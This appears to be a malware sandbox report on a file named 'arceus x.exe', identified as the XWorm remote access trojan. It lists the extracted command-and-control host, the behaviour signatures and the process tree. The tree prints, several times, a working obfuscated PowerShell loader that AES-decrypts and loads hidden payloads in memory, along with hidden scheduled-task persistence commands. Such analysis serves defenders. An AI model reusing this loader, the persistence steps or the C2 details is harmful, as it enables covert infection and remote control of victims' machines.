Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    48s
  • max time network
    48s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    28/06/2024, 11:22

General

  • Target

    arceus x.exe

  • Size

    10.3MB

  • MD5

    380f08da7396daa261f7edabdc161388

  • SHA1

    3622717512e77bb2ea51c9af995fa1c359413d8f

  • SHA256

    2f5ed04a9e2907c09ab4a3d6a984b68976926d2d99f21239bfbe8625b415ccc3

  • SHA512

    f724db6274890b9472067437f69a4d0d01bc4d911a32515d52c502d8524a31c1563641fed55d2021e9853bb2c1618aec24ac23c9f074b7331be4032917598424

  • SSDEEP

    196608:p6iDnLZQi21bRqt9Vs9sMm2agR2wCg6N6FYx1jg+elKIK0G8V1f83:plDLvgbRWs93dW9AFYH8kd0Ge83

Malware Config

Extracted

Family

xworm

Version

5.0

C2

amount-socket.gl.at.ply.gg:29643

Mutex

CBOJbsqFCwukBOQm

Attributes
  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 25 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\arceus x.exe
    "C:\Users\Admin\AppData\Local\Temp\arceus x.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1444
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\cracker.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1792
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c "start /min "" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.bat""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1800
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.bat"
          4⤵
            PID:3556
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ps91keyBb4lnjxdob6tzQba6BACBibl2zBpvZvFNOWc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtrhqYbWWFfSPQvQb3d91A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NRZba=New-Object System.IO.MemoryStream(,$param_var); $jsNQu=New-Object System.IO.MemoryStream; $CLwrs=New-Object System.IO.Compression.GZipStream($NRZba, [IO.Compression.CompressionMode]::Decompress); $CLwrs.CopyTo($jsNQu); $CLwrs.Dispose(); $NRZba.Dispose(); $jsNQu.Dispose(); $jsNQu.ToArray();}function execute_function($param_var,$param2_var){ $GwDBq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MpdiL=$GwDBq.EntryPoint; $MpdiL.Invoke($null, $param2_var);}$MoyRz = 'C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.bat';$host.UI.RawUI.WindowTitle = $MoyRz;$AwuKC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($MoyRz).Split([Environment]::NewLine);foreach ($Eiwrz in $AwuKC) { if ($Eiwrz.StartsWith('OxmjDjVQGELoVrtODSIh')) { $PkJsN=$Eiwrz.Substring(20); break; }}$payloads_var=[string[]]$PkJsN.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
              5⤵
                PID:3748
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • Modifies registry class
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1956
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_822_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_822.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1792
                • C:\Windows\SysWOW64\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_822.vbs"
                  6⤵
                    PID:2284
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_822.bat" "
                      7⤵
                        PID:3128
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ps91keyBb4lnjxdob6tzQba6BACBibl2zBpvZvFNOWc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtrhqYbWWFfSPQvQb3d91A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NRZba=New-Object System.IO.MemoryStream(,$param_var); $jsNQu=New-Object System.IO.MemoryStream; $CLwrs=New-Object System.IO.Compression.GZipStream($NRZba, [IO.Compression.CompressionMode]::Decompress); $CLwrs.CopyTo($jsNQu); $CLwrs.Dispose(); $NRZba.Dispose(); $jsNQu.Dispose(); $jsNQu.ToArray();}function execute_function($param_var,$param2_var){ $GwDBq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MpdiL=$GwDBq.EntryPoint; $MpdiL.Invoke($null, $param2_var);}$MoyRz = 'C:\Users\Admin\AppData\Roaming\Windows_Log_822.bat';$host.UI.RawUI.WindowTitle = $MoyRz;$AwuKC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($MoyRz).Split([Environment]::NewLine);foreach ($Eiwrz in $AwuKC) { if ($Eiwrz.StartsWith('OxmjDjVQGELoVrtODSIh')) { $PkJsN=$Eiwrz.Substring(20); break; }}$payloads_var=[string[]]$PkJsN.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                          8⤵
                            PID:3852
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                            8⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            PID:2832
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 1692
                              9⤵
                              • Program crash
                              PID:2852
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c "start /min "" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\wompwomp.bat""
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4364
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\RarSFX0\wompwomp.bat"
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3444
                    • C:\Windows\SysWOW64\cscript.exe
                      cscript /nologo /e:jscript "C:\Users\Admin\AppData\Local\Temp\RarSFX0\wompwomp.bat"
                      5⤵
                        PID:1216
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c "start /min "" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\website.bat""
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1624
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\RarSFX0\website.bat"
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2100
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=fboNTcjJ8bo
                        5⤵
                        • Enumerates system info in registry
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SendNotifyMessage
                        • Suspicious use of WriteProcessMemory
                        PID:1188
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffda9c33cb8,0x7ffda9c33cc8,0x7ffda9c33cd8
                          6⤵
                            PID:1884
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2012 /prefetch:2
                            6⤵
                              PID:5048
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 /prefetch:3
                              6⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:864
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2744 /prefetch:8
                              6⤵
                                PID:788
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1
                                6⤵
                                  PID:1600
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3132 /prefetch:1
                                  6⤵
                                    PID:3060
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4836 /prefetch:1
                                    6⤵
                                      PID:72
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3512 /prefetch:1
                                      6⤵
                                        PID:1836
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4676 /prefetch:8
                                        6⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:2640
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4620 /prefetch:8
                                        6⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:1776
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4928 /prefetch:1
                                        6⤵
                                          PID:1160
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c "start /min "" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xworm.bat""
                                    3⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:2060
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xworm.bat"
                                      4⤵
                                        PID:3836
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OizxnO3/pdWJ2fJPn6JfWHEAeJ8e9YmWGBkF1RD8gB4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('M1hDsCU064fe3nz1n2J+tA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BuVAi=New-Object System.IO.MemoryStream(,$param_var); $nTyYw=New-Object System.IO.MemoryStream; $UaJSA=New-Object System.IO.Compression.GZipStream($BuVAi, [IO.Compression.CompressionMode]::Decompress); $UaJSA.CopyTo($nTyYw); $UaJSA.Dispose(); $BuVAi.Dispose(); $nTyYw.Dispose(); $nTyYw.ToArray();}function execute_function($param_var,$param2_var){ $UcolZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iAUtD=$UcolZ.EntryPoint; $iAUtD.Invoke($null, $param2_var);}$QWHqr = 'C:\Users\Admin\AppData\Local\Temp\RarSFX0\xworm.bat';$host.UI.RawUI.WindowTitle = $QWHqr;$RtxIM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QWHqr).Split([Environment]::NewLine);foreach ($igBOM in $RtxIM) { if ($igBOM.StartsWith('RgLhaxlcPBQqpmRoVUam')) { $EeOca=$igBOM.Substring(20); break; }}$payloads_var=[string[]]$EeOca.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                          5⤵
                                            PID:3656
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                            5⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Modifies registry class
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4128
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_172_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_172.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                              6⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4656
                                            • C:\Windows\SysWOW64\WScript.exe
                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_172.vbs"
                                              6⤵
                                                PID:2080
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_172.bat" "
                                                  7⤵
                                                    PID:1652
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OizxnO3/pdWJ2fJPn6JfWHEAeJ8e9YmWGBkF1RD8gB4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('M1hDsCU064fe3nz1n2J+tA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BuVAi=New-Object System.IO.MemoryStream(,$param_var); $nTyYw=New-Object System.IO.MemoryStream; $UaJSA=New-Object System.IO.Compression.GZipStream($BuVAi, [IO.Compression.CompressionMode]::Decompress); $UaJSA.CopyTo($nTyYw); $UaJSA.Dispose(); $BuVAi.Dispose(); $nTyYw.Dispose(); $nTyYw.ToArray();}function execute_function($param_var,$param2_var){ $UcolZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iAUtD=$UcolZ.EntryPoint; $iAUtD.Invoke($null, $param2_var);}$QWHqr = 'C:\Users\Admin\AppData\Roaming\Windows_Log_172.bat';$host.UI.RawUI.WindowTitle = $QWHqr;$RtxIM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QWHqr).Split([Environment]::NewLine);foreach ($igBOM in $RtxIM) { if ($igBOM.StartsWith('RgLhaxlcPBQqpmRoVUam')) { $EeOca=$igBOM.Substring(20); break; }}$payloads_var=[string[]]$EeOca.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                      8⤵
                                                        PID:3240
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                        8⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious behavior: GetForegroundWindowSpam
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:3148
                                        • C:\Windows\System32\CompPkgSrv.exe
                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                          1⤵
                                            PID:5012
                                          • C:\Windows\System32\CompPkgSrv.exe
                                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                                            1⤵
                                              PID:1028
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2832 -ip 2832
                                              1⤵
                                                PID:1780

                                              Network

                                              MITRE ATT&CK Enterprise v15

                                              Replay Monitor

                                              Loading Replay Monitor...

                                              Downloads

                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                Filesize

                                                2KB

                                                MD5

                                                8ba8fc1034d449222856ea8fa2531e28

                                                SHA1

                                                7570fe1788e57484c5138b6cead052fbc3366f3e

                                                SHA256

                                                2e72609b2c93e0660390a91c8e5334d62c7b17cd40f9ae8afcc767d345cc12f2

                                                SHA512

                                                7ee42c690e5db3818e445fa8f50f5db39973f8caf5fce0b4d6261cb5a637e63f966c5f1734ee743b9bf30bcf8d18aa70ceb65ed41035c2940d4c6d34735e0d7b

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                Filesize

                                                152B

                                                MD5

                                                0c705388d79c00418e5c1751159353e3

                                                SHA1

                                                aaeafebce5483626ef82813d286511c1f353f861

                                                SHA256

                                                697bd270be634688c48210bee7c5111d7897fd71a6af0bbb2141cefd2f8e4a4d

                                                SHA512

                                                c1614e79650ab9822c4e175ba528ea4efadc7a6313204e4e69b4a9bd06327fb92f56fba95f2595885b1604ca8d8f6b282ab542988995c674d89901da2bc4186f

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                Filesize

                                                152B

                                                MD5

                                                0d84d1490aa9f725b68407eab8f0030e

                                                SHA1

                                                83964574467b7422e160af34ef024d1821d6d1c3

                                                SHA256

                                                40c09bb0248add089873d1117aadefb46c1b4e23241ba4621f707312de9c829e

                                                SHA512

                                                f84552335ff96b5b4841ec26e222c24af79b6d0271d27ad05a9dfcee254a7b9e9019e7fac0def1245a74754fae81f7126499bf1001615073284052aaa949fa00

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                Filesize

                                                5KB

                                                MD5

                                                83e506b90ab01134a49d1c39f81435a4

                                                SHA1

                                                313ab67404fef224ba69c3690819f6ec838cfdb7

                                                SHA256

                                                e934697cff1c479a14fefb6b7d30c45767c57b76f59e8c82fd20dfb176062a75

                                                SHA512

                                                bd7b09b8d7463ab1b44d6e7315ada34a5794a54709ad8912f1e840b2023f54e95a13c21bec73662d5eaf9273a5c8ab9abe98a5e8a291e37b420eef6d3deb2e0d

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                Filesize

                                                6KB

                                                MD5

                                                3abf936b2a2f2edd91e713b4a5d33b97

                                                SHA1

                                                bfadcecc9566777179ea62a934b216abd4e66b30

                                                SHA256

                                                ee183117529cc34604c75321e615018e52515f8ec77a8e67aa7d5a79e82d70de

                                                SHA512

                                                72d8437e336c7d2cb116deb59bebef5d12a92f40dd4bf40b21b8cb62902e372d92e24d3fdee065a6a56566c77ccc9e467374691474ba2f7a6a7cea2774e022ce

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                Filesize

                                                16B

                                                MD5

                                                46295cac801e5d4857d09837238a6394

                                                SHA1

                                                44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                SHA256

                                                0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                SHA512

                                                8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                Filesize

                                                16B

                                                MD5

                                                206702161f94c5cd39fadd03f4014d98

                                                SHA1

                                                bd8bfc144fb5326d21bd1531523d9fb50e1b600a

                                                SHA256

                                                1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

                                                SHA512

                                                0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                Filesize

                                                8KB

                                                MD5

                                                f83f1a3f4a7906ed93685e99de3e48e5

                                                SHA1

                                                35ed7e2a0070b7e6d0e3bef6b9f438e3766af9ff

                                                SHA256

                                                8e0016cbbe024c2a41e839ccf172cf494ba734f49c726557a219f7d7a269c412

                                                SHA512

                                                74459300b7754b229bff4112216ee76a00853cbc4720ec3eb2806f6ccac58820edfda56949536296707ad0eb7a52cb22cf3b5d8fd07eefedd3a4787830e6a354

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                Filesize

                                                8KB

                                                MD5

                                                a8d9fa260268d0aeef5c604ce35c9c5a

                                                SHA1

                                                2c6e5216c65c9364a36e21b5b7fc8db5ff18fa5c

                                                SHA256

                                                138d72817b6d39a6252ff82a6372f38c601cd48fa2b1cbafdfb41fbecc450275

                                                SHA512

                                                185ce2947efa77a78ce0ed9523ec7cc6e86f121c96e5e857a4d7cc9c1caa5f99ceb6a7ba338e76c1e749077aadc0cd93d760b6365693abcffa09fe2f5853417e

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                Filesize

                                                18KB

                                                MD5

                                                1314d6b12ac057e167c1734363b8d32d

                                                SHA1

                                                f54e69b17fb65b8da661c6404eb48ec217639270

                                                SHA256

                                                6fdc5fca629f98db66a207b28ccd11df1d8698539e273082550b7f9eab5e3347

                                                SHA512

                                                0b87e2ad7adc9bc31cf58b4f705f329250185799d99a2ba0d5a83f623dd5f00eb51e38518a9d6ae16868aadc334c69c7d34eacc4a488dfc6303372f5331458ca

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                Filesize

                                                18KB

                                                MD5

                                                2a1fdb89cf408566ad184e42e71bb123

                                                SHA1

                                                2f834624e56b5082a6a25a88e3d915cbfbc3755c

                                                SHA256

                                                a7f4944b7fa7efb91706f53d6694c619e5f165402b59630c4471513c8e1d515d

                                                SHA512

